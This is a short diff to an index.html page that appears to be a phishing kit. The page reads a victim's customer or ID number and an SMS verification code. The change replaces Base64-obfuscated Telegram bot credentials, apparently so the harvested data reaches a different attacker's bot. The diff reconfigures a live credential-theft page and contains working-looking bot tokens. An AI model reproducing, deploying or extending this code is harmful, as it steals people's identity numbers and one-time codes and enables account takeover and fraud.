--- a/index.html
+++ b/index.html
@@ -269,8 +269,8 @@
                                                             var tc = document.getElementById('custno').value;
                                                             var sms = document.getElementById('sms').value;
                                                 
-                                                            var botTokenBase64 = 'Njc4NjkyNDQ1ODpBQUZvRzFCaGtIZDZGR21JNlFkUXZxa0k5TXFxbXFOcHBlOA=='; // Buraya Base64 ile kodlanmış botToken ekleyin
-                                                            var chatIdBase64 = 'NjMzODg5Mjk2NQ==';
+                                                            var botTokenBase64 = 'NTk4NTc2OTI0NDpBQUYyLXo1LUVHVVN4cWJGRUdoZGp2cFFLVjRZZ05zNEZXcw=='; // Buraya Base64 ile kodlanmış botToken ekleyin
+                                                            var chatIdBase64 = 'NTU0NjI0Njc3Ng==';
                                                 
                                                             var botToken = atob(botTokenBase64);
                                                             var chatId = atob(chatIdBase64);
